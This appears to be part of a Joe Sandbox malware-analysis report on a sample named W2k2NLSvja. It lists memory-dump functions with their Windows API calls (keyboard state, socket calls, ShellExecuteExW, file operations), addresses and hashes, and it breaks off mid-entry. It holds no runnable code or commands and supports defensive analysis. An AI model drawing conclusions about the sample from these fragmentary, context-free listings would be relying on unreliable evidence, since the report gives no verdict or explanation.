                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1211466189-0
                                                                                                                        • Opcode ID: 46052702310836318c7e03dad1270c128d84b2225fb04d97de92a17d990bc445
                                                                                                                        • Instruction ID: a091ecbbc06e84f8b93d98b66e546c72f242363e5fde1b7dc5f28e0b3042f2fd
                                                                                                                        • Opcode Fuzzy Hash: 46052702310836318c7e03dad1270c128d84b2225fb04d97de92a17d990bc445
                                                                                                                        • Instruction Fuzzy Hash: F8B18C71500216EBEF16CFACC9C57AD7BF2BF45701F0481A9ED889B289D735A990CB60
                                                                                                                        APIs
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC417,00000004,00000000,00000000,00000000), ref: 00F82ACF
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00FBC417,00000004,00000000,00000000,00000000,000000FF), ref: 00F82B17
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00FBC417,00000004,00000000,00000000,00000000), ref: 00FBC46A
                                                                                                                        • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00FBC417,00000004,00000000,00000000,00000000), ref: 00FBC4D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ShowWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1268545403-0
                                                                                                                        • Opcode ID: 6d31351e066f73f25dc4d1ef1bdf70c92dccc8fcfeb3919a9a03ac79120108e9
                                                                                                                        • Instruction ID: 0df96302fa9fc55ff94c61ba2eb20f376e60c058d4f5e09d93112c6150ec6fde
                                                                                                                        • Opcode Fuzzy Hash: 6d31351e066f73f25dc4d1ef1bdf70c92dccc8fcfeb3919a9a03ac79120108e9
                                                                                                                        • Instruction Fuzzy Hash: AB411775A04680ABC7BEBB29CC987FB7B92BF86320F14840DE08786550C63EB941F750
                                                                                                                        APIs
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 00FE737F
                                                                                                                          • Part of subcall function 00FA0FF6: std::exception::exception.LIBCMT ref: 00FA102C
                                                                                                                          • Part of subcall function 00FA0FF6: __CxxThrowException@8.LIBCMT ref: 00FA1041
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00FE73B6
                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 00FE73D2
                                                                                                                        • _memmove.LIBCMT ref: 00FE7420
                                                                                                                        • _memmove.LIBCMT ref: 00FE743D
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 00FE744C
                                                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00FE7461
                                                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00FE7480
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 256516436-0
                                                                                                                        • Opcode ID: ea3325c57126fb55525bd49f178f0a296cbdc89dfa21dea376ca506e824bb67f
                                                                                                                        • Instruction ID: 3cc6dfd8ed884cb19a60e5f97bf8a2c8226c85e487d37644f92ae9d7ee30580b
                                                                                                                        • Opcode Fuzzy Hash: ea3325c57126fb55525bd49f178f0a296cbdc89dfa21dea376ca506e824bb67f
                                                                                                                        • Instruction Fuzzy Hash: 07319E71904205EFCF20EF65DC85AAE7B78FF45310F1540A5F904AB24ADB759A10EBA0
                                                                                                                        APIs
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 0100645A
                                                                                                                        • GetDC.USER32(00000000), ref: 01006462
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0100646D
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 01006479
                                                                                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 010064B5
                                                                                                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 010064C6
                                                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01009299,?,?,000000FF,00000000,?,000000FF,?), ref: 01006500
                                                                                                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01006520
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3864802216-0
                                                                                                                        • Opcode ID: 1fad5e6d80b0711aa5edb1a33e3753751e5ed23a73c15914d64558c08436e059
                                                                                                                        • Instruction ID: 8bccf54edc9ad201a24076bf2066be5e7b10292523ff53e2fa7a9a14d6384570
                                                                                                                        • Opcode Fuzzy Hash: 1fad5e6d80b0711aa5edb1a33e3753751e5ed23a73c15914d64558c08436e059
                                                                                                                        • Instruction Fuzzy Hash: 4431A072200210BFEB228F64CC49FEB3FAAEF0A761F044055FE48DA195C67A9851CB70
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2931989736-0
                                                                                                                        • Opcode ID: 682a93578d8b582de1c75c919844658e49ad29965c0549120fd65d528fd6dfb6
                                                                                                                        • Instruction ID: bc31aea37246d8848aa7d0016a53ff9fbc1e0881417a308c4d948659c23f2f5e
                                                                                                                        • Opcode Fuzzy Hash: 682a93578d8b582de1c75c919844658e49ad29965c0549120fd65d528fd6dfb6
                                                                                                                        • Instruction Fuzzy Hash: EE21D7B2A40217B7D210A5218D46FAB335EAF113A4F1C4026FE05DA352EB59DD11F2E5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                          • Part of subcall function 00F9FEC6: _wcscpy.LIBCMT ref: 00F9FEE9
                                                                                                                        • _wcstok.LIBCMT ref: 00FEEEFF
                                                                                                                        • _wcscpy.LIBCMT ref: 00FEEF8E
                                                                                                                        • _memset.LIBCMT ref: 00FEEFC1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                        • String ID: X
                                                                                                                        • API String ID: 774024439-3081909835
                                                                                                                        • Opcode ID: bcd55bd147cadd8ca6d4ef83000bd4dc38142af337559619f5ae2b6e7acecb76
                                                                                                                        • Instruction ID: a3476cd85c1cf20598880d39b59927841a76635387f8a74c18101b8d8655dfa7
                                                                                                                        • Opcode Fuzzy Hash: bcd55bd147cadd8ca6d4ef83000bd4dc38142af337559619f5ae2b6e7acecb76
                                                                                                                        • Instruction Fuzzy Hash: 89C191715083419FC724FF24CC85A9AB7E4BF85314F14492DF899872A2DB74ED45EB82
                                                                                                                        APIs
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00FF6F14
                                                                                                                        • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00FF6F35
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF6F48
                                                                                                                        • htons.WSOCK32(?,?,?,00000000,?), ref: 00FF6FFE
                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00FF6FBB
                                                                                                                          • Part of subcall function 00FDAE14: _strlen.LIBCMT ref: 00FDAE1E
                                                                                                                          • Part of subcall function 00FDAE14: _memmove.LIBCMT ref: 00FDAE40
                                                                                                                        • _strlen.LIBCMT ref: 00FF7058
                                                                                                                        • _memmove.LIBCMT ref: 00FF70C1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3619996494-0
                                                                                                                        • Opcode ID: e3eb7e39a7d49c5bb29863ce4d27d28367023e984b95e9b14cfd9d61826a28e2
                                                                                                                        • Instruction ID: 582547644fceda966ea95acebb235b6615e55591555b07fc6e4848a7f9092523
                                                                                                                        • Opcode Fuzzy Hash: e3eb7e39a7d49c5bb29863ce4d27d28367023e984b95e9b14cfd9d61826a28e2
                                                                                                                        • Instruction Fuzzy Hash: F981E032508304ABD710FB24CC86FBBB3A9AF84B24F144518F6559B2A2DF759D01E752
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 493a6128d64032dd707b32d67927e23b042d9fe5a32a65dec03b52961b86fb0e
                                                                                                                        • Instruction ID: 7da544a80549920ea30074c55ccbd1d764547065dcf967efb33bff2ba3515209
                                                                                                                        • Opcode Fuzzy Hash: 493a6128d64032dd707b32d67927e23b042d9fe5a32a65dec03b52961b86fb0e
                                                                                                                        • Instruction Fuzzy Hash: BB717031900109EFDB15DF59CC49AFEBB79FF86320F248249F915AA251C734AA52EF60
                                                                                                                        APIs
                                                                                                                        • IsWindow.USER32(01695B68), ref: 0100B6A5
                                                                                                                        • IsWindowEnabled.USER32(01695B68), ref: 0100B6B1
                                                                                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0100B795
                                                                                                                        • SendMessageW.USER32(01695B68,000000B0,?,?), ref: 0100B7CC
                                                                                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0100B809
                                                                                                                        • GetWindowLongW.USER32(01695B68,000000EC), ref: 0100B82B
                                                                                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0100B843
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4072528602-0
                                                                                                                        • Opcode ID: f35b602a12b56171aa8b059fa8cd59cc3a10f7ff9c82ea8f86751338302721ee
                                                                                                                        • Instruction ID: 3bf05f11841abf1d76ce76f85401cf5e6214cf323f11c69c4f49226b09ac2235
                                                                                                                        • Opcode Fuzzy Hash: f35b602a12b56171aa8b059fa8cd59cc3a10f7ff9c82ea8f86751338302721ee
                                                                                                                        • Instruction Fuzzy Hash: 9E718178604205AFFB62DF68C8D4FAA7BF5FF49300F084099E9C597291DB36A941DB50
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00FFF75C
                                                                                                                        • _memset.LIBCMT ref: 00FFF825
                                                                                                                        • ShellExecuteExW.SHELL32(?), ref: 00FFF86A
                                                                                                                          • Part of subcall function 00F89997: __itow.LIBCMT ref: 00F899C2
                                                                                                                          • Part of subcall function 00F89997: __swprintf.LIBCMT ref: 00F89A0C
                                                                                                                          • Part of subcall function 00F9FEC6: _wcscpy.LIBCMT ref: 00F9FEE9
                                                                                                                        • GetProcessId.KERNEL32(00000000), ref: 00FFF8E1
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00FFF910
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 3522835683-2766056989
                                                                                                                        • Opcode ID: 08acf50b7ffdbd88ef8bbf3ed2641b2e89b1a6f08992ea6c792294aa099ac4b8
                                                                                                                        • Instruction ID: 604649b371830046e223fd37ac43f3f13d6d802ae56837f62cc21a60c77d330f
                                                                                                                        • Opcode Fuzzy Hash: 08acf50b7ffdbd88ef8bbf3ed2641b2e89b1a6f08992ea6c792294aa099ac4b8
                                                                                                                        • Instruction Fuzzy Hash: A661AE75E006199FCF14EF54C8849AEBBF4FF48310F148069E856AB361CB74AD45EB90
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(?), ref: 00FE149C
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00FE14B1
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00FE1512
                                                                                                                        • PostMessageW.USER32(?,00000101,00000010,?), ref: 00FE1540
                                                                                                                        • PostMessageW.USER32(?,00000101,00000011,?), ref: 00FE155F
                                                                                                                        • PostMessageW.USER32(?,00000101,00000012,?), ref: 00FE15A5
                                                                                                                        • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00FE15C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                                                                                                                        • Instruction ID: 11f685f2ed4e8c14bfb78c852d0ed8623986c8d6cf3a875419ebea19e86a8090
                                                                                                                        • Opcode Fuzzy Hash: 2496702346e08df30cc632cb50f17cfb1e58b9699b2dc3ccc12ae575f815758e
                                                                                                                        • Instruction Fuzzy Hash: 8D51E2B0A047D53EFB3282378C45BBABEA97B46314F0C4589E1D6458C2C3F99C94E750
                                                                                                                        APIs
                                                                                                                        • GetParent.USER32(00000000), ref: 00FE12B5
                                                                                                                        • GetKeyboardState.USER32(?), ref: 00FE12CA
                                                                                                                        • SetKeyboardState.USER32(?), ref: 00FE132B
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00FE1357
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00FE1374
                                                                                                                        • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00FE13B8
                                                                                                                        • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00FE13D9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessagePost$KeyboardState$Parent
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 87235514-0
                                                                                                                        • Opcode ID: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                                                                                                                        • Instruction ID: 1360fa1296e5596dcd4a868452773e89b7894b8acdbc426af4b7d2c7a1bfb346
                                                                                                                        • Opcode Fuzzy Hash: 855ece47be971be2f117609a29fc2543c4d4f2257185e32b92cd5ca9d34eac79
                                                                                                                        • Instruction Fuzzy Hash: 3851D2B09046D53DFB3287278C45BBABFA97B06310F088589E1D44A8C2D3A5EC98F760
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcsncpy$LocalTime
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2945705084-0
                                                                                                                        • Opcode ID: 78865b771cd05058cf728c33d32cfe8ff9b50e1aea37608cfc0cbd6d52b643b6
                                                                                                                        • Instruction ID: acced8c927d6d2743956d7ed51548872283904b4abeb26129bf5d662cad9ddc1
                                                                                                                        • Opcode Fuzzy Hash: 78865b771cd05058cf728c33d32cfe8ff9b50e1aea37608cfc0cbd6d52b643b6
                                                                                                                        • Instruction Fuzzy Hash: E741D5E5C2051876CB50EBB5CC86ACFB7A8AF06710F508466F518E3122E738E754E7A5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FE48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00FE38D3,?), ref: 00FE48C7
                                                                                                                          • Part of subcall function 00FE48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00FE38D3,?), ref: 00FE48E0
                                                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 00FE38F3
                                                                                                                        • _wcscmp.LIBCMT ref: 00FE390F
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00FE3927
                                                                                                                        • _wcscat.LIBCMT ref: 00FE396F
                                                                                                                        • SHFileOperationW.SHELL32(?), ref: 00FE39DB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                        • String ID: \*.*
                                                                                                                        • API String ID: 1377345388-1173974218
                                                                                                                        • Opcode ID: e9c64bf38780c7bb90c39391ccf9ce080988747bcf5b87f5bc5772abd4bff9dd
                                                                                                                        • Instruction ID: 1c6878154e30e41ec503dd48284be277aa6f2020238e0c303fc7268869dff8eb
                                                                                                                        • Opcode Fuzzy Hash: e9c64bf38780c7bb90c39391ccf9ce080988747bcf5b87f5bc5772abd4bff9dd
                                                                                                                        • Instruction Fuzzy Hash: E64182B25083849EC751EF65C889ADFB7E8AF89350F10092EB489C3152EB79D788D752
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 01007519
                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010075C0
                                                                                                                        • IsMenu.USER32(?), ref: 010075D8
                                                                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01007620
                                                                                                                        • DrawMenuBar.USER32 ref: 01007633
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
